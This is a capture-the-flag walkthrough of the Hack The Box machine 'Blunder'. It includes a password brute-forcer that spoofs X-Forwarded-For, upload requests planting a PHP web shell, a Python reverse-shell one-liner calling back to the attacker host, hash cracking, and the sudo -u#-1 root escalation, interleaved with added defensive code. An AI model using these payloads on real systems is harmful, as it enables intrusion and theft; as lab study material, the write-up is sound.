2020-06-01
HTB::Blunder Walkthrough
0x01 Info Card
nmap
dirsearch
wfuzz
cewl
CMS password leakage
sudo -u#-1
0x03 Pentesting
Initial Enumeration
Port scan with nmap:

```
Nmap scan report for blunder.htb (10.10.10.191)
Host is up (0.28s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
```
Directory scan with dirsearch:

```
$ sudo dirsearch -u http://blunder.htb -e *

Extensions: 46060.txt | HTTP method: get | Threads: 10 | Wordlist size: 6124

Target: http://blunder.htb

[17:25:56] Starting:
[17:25:59] 200 -    7KB - /%3f/
[17:26:07] 200 -  563B  - /.gitignore
[17:26:24] 200 -    7KB - /0
[17:26:41] 200 -    3KB - /about
[17:26:49] 301 -    0B  - /admin  ->  http://10.10.10.191/admin/
[17:26:53] 200 -    2KB - /admin/.config
[17:26:53] 200 -    2KB - /admin/
... ...
[17:29:40] 200 -    2KB - /admin/web/
[17:29:40] 200 -    2KB - /admin/login.htm
[17:31:22] 301 -    0B  - /domcfg.nsf/?open  ->  http://10.10.10.191/domcfg.nsf
[17:32:02] 200 -   30B  - /install.php
[17:32:14] 200 -    1KB - /LICENSE
[17:33:29] 200 -    3KB - /README.md
[17:33:33] 200 -   22B  - /robots.txt
```
/admin asks for a username and password, and .gitignore and robots.txt contain nothing usable, so the next step is to find credentials for the admin panel.
Use wfuzz to check whether any sensitive files sit under the web root:

```
$ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt --hc 404,403 -u "http://blunder.htb/FUZZ.txt" -t 100
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://blunder.htb/FUZZ.txt
Total requests: 4652

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000003513:   200        1 L      4 W      22 Ch       "robots"
000004119:   200        4 L      23 W     118 Ch      "todo"

Total time: 44.66474
Processed Requests: 4652
Filtered Requests: 4650
Requests/sec.: 104.1537
```
Contents of todo.txt:

```
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING
```
A blind guess: fergus is probably the username, so what remains is the password. After half a day of searching with no progress, and knowing HTB's habits, the answer is most likely a custom wordlist generated from the text on the homepage.
```
$ cewl -w wordlist.txt -d 10 -m 1 http://blunder.htb/
$ wc wordlist.txt
354 354 2459 wordlist.txt
```
Neither Burp nor wfuzz managed to brute-force it, so the only option left was a Python script:

```python
import re
import requests


def open_resources(file_path):
    # one candidate password per line, newline stripped
    return [item.replace("\n", "") for item in open(file_path).readlines()]


host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = open_resources('/home/Hackthebox/Blunder/wordlist.txt')

for password in wordlist:
    # fresh session per attempt: the login form issues a new CSRF token each time
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
    print('[*] Trying: {p}'.format(p=password))
    headers = {
        # a different X-Forwarded-For value on every attempt
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }
    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }
    # do not follow the redirect; the Location header tells us whether login succeeded
    login_result = session.post(login_url, headers=headers, data=data, allow_redirects=False)
    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u=username, p=password))
            print()
            break
```
Result of the run:

```
[*] Trying: character
[*] Trying: RolandDeschain

SUCCESS: Password found!
Use fergus:RolandDeschain to login.
```
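Seen from the defender's side, the reason the script above sends a different X-Forwarded-For value on every attempt is that a login lockout which derives the client address from that header treats each attempt as a new client, so the counter never trips. The following Python is an added example, not the page's script and not Bludit's code: it models a per-address failure counter with the weak address derivation beside a hardened one that honours X-Forwarded-For only when the TCP peer is a configured proxy. The ATTEMPTS list, the MAX_FAILURES value and the TRUSTED_PROXIES set are constructed for the illustration.

```python
from collections import defaultdict

# Constructed sample of what the login endpoint sees per attempt. Every
# request really arrives from one TCP peer (10.10.14.4), but each carries
# a different X-Forwarded-For value, exactly as the script above sends it.
ATTEMPTS = [
    {"remote_addr": "10.10.14.4", "xff": "character", "password": "character"},
    {"remote_addr": "10.10.14.4", "xff": "facts", "password": "facts"},
    {"remote_addr": "10.10.14.4", "xff": "blunder", "password": "blunder"},
    {"remote_addr": "10.10.14.4", "xff": "interesting", "password": "interesting"},
    {"remote_addr": "10.10.14.4", "xff": "RolandDeschain", "password": "RolandDeschain"},
]

MAX_FAILURES = 3                  # lock an address after this many failures (constructed value)
TRUSTED_PROXIES = {"10.10.10.1"}  # hypothetical reverse-proxy addresses


def client_ip_weak(remote_addr, xff):
    """Vulnerable pattern: believe X-Forwarded-For no matter who sent it."""
    if xff:
        return xff.split(",")[0].strip()
    return remote_addr


def client_ip_hardened(remote_addr, xff, trusted_proxies=TRUSTED_PROXIES):
    """Honour X-Forwarded-For only when the TCP peer is a known proxy, and then
    take the last hop (the one the proxy appended), not the client-supplied first one."""
    if remote_addr in trusted_proxies and xff:
        return xff.split(",")[-1].strip()
    return remote_addr


class LoginGuard:
    """Per-address failure counter wrapping a deliberately trivial password check."""

    def __init__(self, resolve_ip, correct_password):
        self.resolve_ip = resolve_ip
        self.correct_password = correct_password
        self.failures = defaultdict(int)

    def attempt(self, req):
        ip = self.resolve_ip(req["remote_addr"], req["xff"])
        if self.failures[ip] >= MAX_FAILURES:
            return "locked"          # refuse before even looking at the password
        if req["password"] == self.correct_password:
            self.failures[ip] = 0
            return "success"
        self.failures[ip] += 1
        return "failed"


def simulate(resolve_ip, attempts=ATTEMPTS, correct_password="RolandDeschain"):
    """Run the attempt list through a guard and return the verdict per attempt."""
    guard = LoginGuard(resolve_ip, correct_password)
    return [guard.attempt(a) for a in attempts]


if __name__ == "__main__":
    print("weak:    ", simulate(client_ip_weak))      # every attempt counts as a new client
    print("hardened:", simulate(client_ip_hardened))  # locked after MAX_FAILURES
```

With the weak resolver the guard sees five distinct "clients" and the last guess goes through; with the hardened resolver every attempt is charged to 10.10.14.4 and the fourth and fifth are refused without the password being checked. A reverse proxy that strips or overwrites client-supplied X-Forwarded-For values achieves the same thing one layer earlier.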
Log in to the admin panel with fergus:RolandDeschain.

The site turns out to be built on the open-source Bludit CMS; a quick Google search for public CVEs turns up:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16113
Following the GitHub link under References also leads to the CVE author's own account of finding it, and the author, @christa, is Chinese too. (For once there was no need to read an exploitation write-up in English 😄)
https://christa.top/details/46/
First upload a .htaccess file, editing the request in Burp to get past the client-side extension check:

```http
POST /admin/ajax/upload-images HTTP/1.1
Host: blunder.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://blunder.htb/admin/new-content
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------5424398841862763197378512212
Content-Length: 531
Connection: close
Cookie: BLUDITREMEMBERUSERNAME=fergus; BLUDITREMEMBERTOKEN=d08d8cfe8c70b89c242b0a33531998d7; BLUDIT-KEY=dpodie00jad4a6akmo5hookqd2

-----------------------------5424398841862763197378512212
Content-Disposition: form-data; name="images[]"; filename=".htaccess"
Content-Type: image/jpeg

RewriteEngine Off
-----------------------------5424398841862763197378512212
Content-Disposition: form-data; name="uuid"

0fad6e18e5d590f2af2b005ac4f7f80f
-----------------------------5424398841862763197378512212
Content-Disposition: form-data; name="tokenCSRF"

7ca474f9c654ff0e46761ac0e435423a5a8c012a
-----------------------------5424398841862763197378512212--
```
Then upload the shell file:

```http
POST /admin/ajax/upload-images HTTP/1.1
Host: blunder.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://blunder.htb/admin/new-content
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------5424398841862763197378512212
Content-Length: 540
Connection: close
Cookie: BLUDITREMEMBERUSERNAME=fergus; BLUDITREMEMBERTOKEN=d08d8cfe8c70b89c242b0a33531998d7; BLUDIT-KEY=dpodie00jad4a6akmo5hookqd2

-----------------------------5424398841862763197378512212
Content-Disposition: form-data; name="images[]"; filename="shell.php"
Content-Type: image/jpeg

GIF89a
<?php system($_GET['cmd']); ?>
-----------------------------5424398841862763197378512212
Content-Disposition: form-data; name="uuid"

0fad6e18e5d590f2af2b005ac4f7f80f
-----------------------------5424398841862763197378512212
Content-Disposition: form-data; name="tokenCSRF"

7ca474f9c654ff0e46761ac0e435423a5a8c012a
-----------------------------5424398841862763197378512212--
```
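Both uploads above get through because the server accepts what the client says about the file: an image/jpeg Content-Type on a dotfile that is really Apache configuration, and a GIF89a header glued in front of PHP. The following Python is an added example, not Bludit's upload handler, that puts that weak check beside a hardened validator: the file name must be a plain base name with one allow-listed extension (so no .htaccess and no double extensions), the body's magic bytes must match that extension, and an image body containing a PHP open tag is rejected. The SAMPLES list is constructed in the shape of the two requests above, with truncated bodies rather than real files.

```python
import re

# Constructed sample uploads in the shape of the two requests above: an
# Apache config dotfile declared as JPEG, PHP hidden behind a GIF header,
# and a genuine (truncated) GIF for contrast. Bodies are not real files.
SAMPLES = [
    {"filename": ".htaccess", "content_type": "image/jpeg",
     "body": b"RewriteEngine Off\n"},
    {"filename": "shell.php", "content_type": "image/jpeg",
     "body": b"GIF89a\n<?php system($_GET['cmd']); ?>\n"},
    {"filename": "photo.gif", "content_type": "image/gif",
     "body": b"GIF89a" + b"\x00" * 32},
]

# Allowed extensions and the magic bytes each one must begin with.
ALLOWED = {
    "png":  [b"\x89PNG\r\n\x1a\n"],
    "gif":  [b"GIF87a", b"GIF89a"],
    "jpg":  [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
}

# A plain base name with exactly one extension: no leading dot, no path
# separators, no second extension such as shell.php.jpg.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+\.([A-Za-z0-9]+)")


def check_weak(upload):
    """Vulnerable pattern: accept anything the client labels as an image."""
    return upload["content_type"].startswith("image/")


def check_hardened(upload):
    """Allow-listed extension, matching magic bytes, and no PHP tag in the body."""
    match = SAFE_NAME.fullmatch(upload["filename"])
    if not match:
        return False
    ext = match.group(1).lower()
    if ext not in ALLOWED:
        return False
    body = upload["body"]
    if not any(body.startswith(sig) for sig in ALLOWED[ext]):
        return False
    # A legitimate image never needs a PHP open tag; rejecting it blocks the
    # GIF89a-plus-PHP polyglot even where the extension check alone would pass it.
    if b"<?php" in body or b"<?=" in body:
        return False
    return True


def evaluate(checker, uploads=SAMPLES):
    """Return the checker's verdict for each sample, in order."""
    return [checker(u) for u in uploads]


if __name__ == "__main__":
    for u, weak, hard in zip(SAMPLES, evaluate(check_weak), evaluate(check_hardened)):
        print(f"{u['filename']:<12} weak={weak!s:<5} hardened={hard}")
```

The weak check passes all three samples; the hardened one passes only photo.gif. The byte-level check is a second line of defence, not the whole fix: uploads should also be stored outside the document root under a server-generated name, and ideally re-encoded through an image library so that whatever was appended to the original bytes is discarded.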
Start a listener locally, then open the shell file in the browser with the following cmd parameter:

```
http://blunder.htb/bl-content/tmp/shell.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
The reverse shell comes back on the local machine:

```
# kali @ kali in ~/HackTheBox/Blunder [17:25:45]
$ nc -lvnp 9999
listening on [any] 9999 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.191] 59878
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
Getting User Access
The next job is to find a username and password to escalate with; easy-rated boxes like this one usually leak them in some file~
After some searching, there is another, newer copy of Bludit CMS under /var/www; one of its files, users.php, lives in /var/www/bludit-3.10.0a/bl-content/databases:

```php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""
    }
}
```
There is obviously a password field, and it looks like it has been hashed once; hash-identifier shows the likely algorithm:

```
Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))

Least Possible Hashs:
[+] Tiger-160
[+] Haval-160
[+] RipeMD-160
[+] SHA-1(HMAC)
[+] Tiger-160(HMAC)
[+] RipeMD-160(HMAC)
[+] Haval-160(HMAC)
[+] SHA-1(MaNGOS)
[+] SHA-1(MaNGOS2)
[+] sha1($pass.$salt)
[+] sha1($salt.$pass)
[+] sha1($salt.md5($pass))
[+] sha1($salt.md5($pass).$salt)
[+] sha1($salt.sha1($pass))
[+] sha1($salt.sha1($salt.sha1($pass)))
[+] sha1($username.$pass)
[+] sha1($username.$pass.$salt)
[+] sha1(md5($pass))
[+] sha1(md5($pass).$salt)
[+] sha1(md5(sha1($pass)))
[+] sha1(sha1($pass))
[+] sha1(sha1($pass).$salt)
[+] sha1(sha1($pass).substr($pass,0,3))
[+] sha1(sha1($salt.$pass))
[+] sha1(sha1(sha1($pass)))
[+] sha1(strtolower($username).$pass)
--------------------------------------------------
```
Entering faca404fd5c0a31cf1897b823c695c85cffeb98d into the online lookup tool https://md5decrypt.net/en/Sha1 returns the plaintext Password120.
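The users.php entry stores the password as unsalted SHA-1, which is exactly why pasting the digest into a lookup service returns the plaintext: every user of every site who chose that password has the same digest, so one precomputed table answers for all of them. The following Python is an added example, not the CMS's code, contrasting that legacy scheme with a salted PBKDF2-HMAC-SHA256 hash from the standard library; the CANDIDATES list standing in for a precomputed table is constructed for the demonstration.

```python
import hashlib
import hmac
import os

PBKDF2_ITERATIONS = 600_000   # current OWASP figure for PBKDF2-HMAC-SHA256


def hash_legacy(password):
    """Unsalted SHA-1, the scheme behind the users.php entry above."""
    return hashlib.sha1(password.encode()).hexdigest()


def hash_hardened(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256; returns 'salt_hex$digest_hex'."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return salt.hex() + "$" + digest.hex()


def verify_hardened(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, _ = stored.split("$", 1)
    recomputed = hash_hardened(password, bytes.fromhex(salt_hex))
    return hmac.compare_digest(recomputed, stored)


def lookup_attack(target, candidates):
    """What an online SHA-1 lookup service does: a table built once from
    common passwords answers for every site that stores unsalted digests."""
    table = {hash_legacy(c): c for c in candidates}
    return table.get(target)


# Constructed candidate list standing in for a precomputed table.
CANDIDATES = ["password", "123456", "Password120", "letmein"]


def demo():
    """Return the facts the contrast rests on."""
    legacy_a = hash_legacy("Password120")
    legacy_b = hash_legacy("Password120")          # a second user, same password
    hardened_a = hash_hardened("Password120")
    hardened_b = hash_hardened("Password120")      # same password, fresh salt
    return {
        "legacy_identical": legacy_a == legacy_b,          # what makes the table work
        "hardened_identical": hardened_a == hardened_b,
        "legacy_recovered": lookup_attack(legacy_a, CANDIDATES),
        "hardened_recovered": lookup_attack(hardened_a, CANDIDATES),
        "verify_ok": verify_hardened("Password120", hardened_a),
        "verify_wrong": verify_hardened("Password121", hardened_a),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

With the legacy scheme the two users collide and the table recovers the password immediately; with a per-user salt the same password yields two unrelated strings, the table finds nothing, and each guess has to be paid for at the full iteration cost. A dedicated password hash such as bcrypt, scrypt or Argon2 is the usual production choice; PBKDF2 is used here only because it ships with the interpreter.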
Switch user with su:

```
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ su hugo
su hugo
Password: Password120

hugo@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ id
id
uid=1001(hugo) gid=1001(hugo) groups=1001(hugo)
hugo@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cd
cd
hugo@blunder:~$ cat user.txt
cat user.txt
947a-----------------------a7bb
```
Getting Root Access
Following the usual routine:

```
hugo@blunder:~$ sudo -l
sudo -l
Password: Password120

Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
```
Googling (ALL, !root) /bin/bash turns up the following privilege escalation:
https://www.exploit-db.com/exploits/47502
Very simple, one command does it:

```
hugo@blunder:~$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
root@blunder:/home/hugo# id
id
uid=0(root) gid=1001(hugo) groups=1001(hugo)
root@blunder:/home/hugo# cd
cd
root@blunder:/# cat /root/root.txt
cat /root/root.txt
b4c0------------------------d45f
```
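The (ALL, !root) rule is meant to let hugo run bash as anyone except root, and -u#-1 gets past it because the numeric id -1 does not match the excluded name while a sudo affected by the bug referenced above still resolves it to uid 0. Beyond patching sudo, the durable fix is to never rely on a ! exclusion at all and list the permitted target users explicitly. The following Python is an added audit helper, not part of the page's tooling and not sudo itself: it parses `sudo -l` style output and flags runas specifications that rely on an exclusion rather than an allow-list, and rules that hand out an interactive shell. SUDO_L_OUTPUT is constructed in the shape of the session above, with a second made-up rule so the audit has something it should leave alone.

```python
import re

# Constructed `sudo -l` output in the shape of the session above, plus a
# second made-up rule so the audit has something it should not flag.
SUDO_L_OUTPUT = """\
Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
    (www-data) NOPASSWD: /usr/bin/systemctl restart apache2
"""

# "(runas[, runas...][ : group...]) [TAG: ...] command [args]"
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>\S.*)$")
SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "/bin/zsh", "/usr/bin/bash"}


def parse_rules(text):
    """Return (runas_users, tags, command) for every rule line in sudo -l output."""
    rules = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue
        # keep only the user part of "(users : groups)"
        user_spec = m.group("runas").split(":")[0]
        runas = [p.strip() for p in user_spec.split(",") if p.strip()]
        rules.append((runas, m.group("tags").strip(), m.group("cmd").strip()))
    return rules


def audit(text):
    """Return (command, reason) findings for risky runas specifications."""
    findings = []
    for runas, _tags, cmd in parse_rules(text):
        allowed = [r for r in runas if not r.startswith("!")]
        excluded = [r[1:] for r in runas if r.startswith("!")]
        if "ALL" in allowed and excluded:
            findings.append((cmd, "runas ALL minus {%s}: an exclusion is not a safe control; "
                                  "list the permitted target users explicitly" % ",".join(excluded)))
        if cmd.split()[0] in SHELLS:
            findings.append((cmd, "rule grants an interactive shell"))
    return findings


if __name__ == "__main__":
    for cmd, reason in audit(SUDO_L_OUTPUT):
        print(f"[!] {cmd}: {reason}")
```

Run against the constructed output the audit raises two findings, both for the /bin/bash rule, and nothing for the systemctl rule. The same parser can be pointed at the output of `sudo -l -U <user>` across a fleet to find every rule written in the exclusion style.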
Apart from hunting for the password, this box was fairly easy~~
0x04 Reference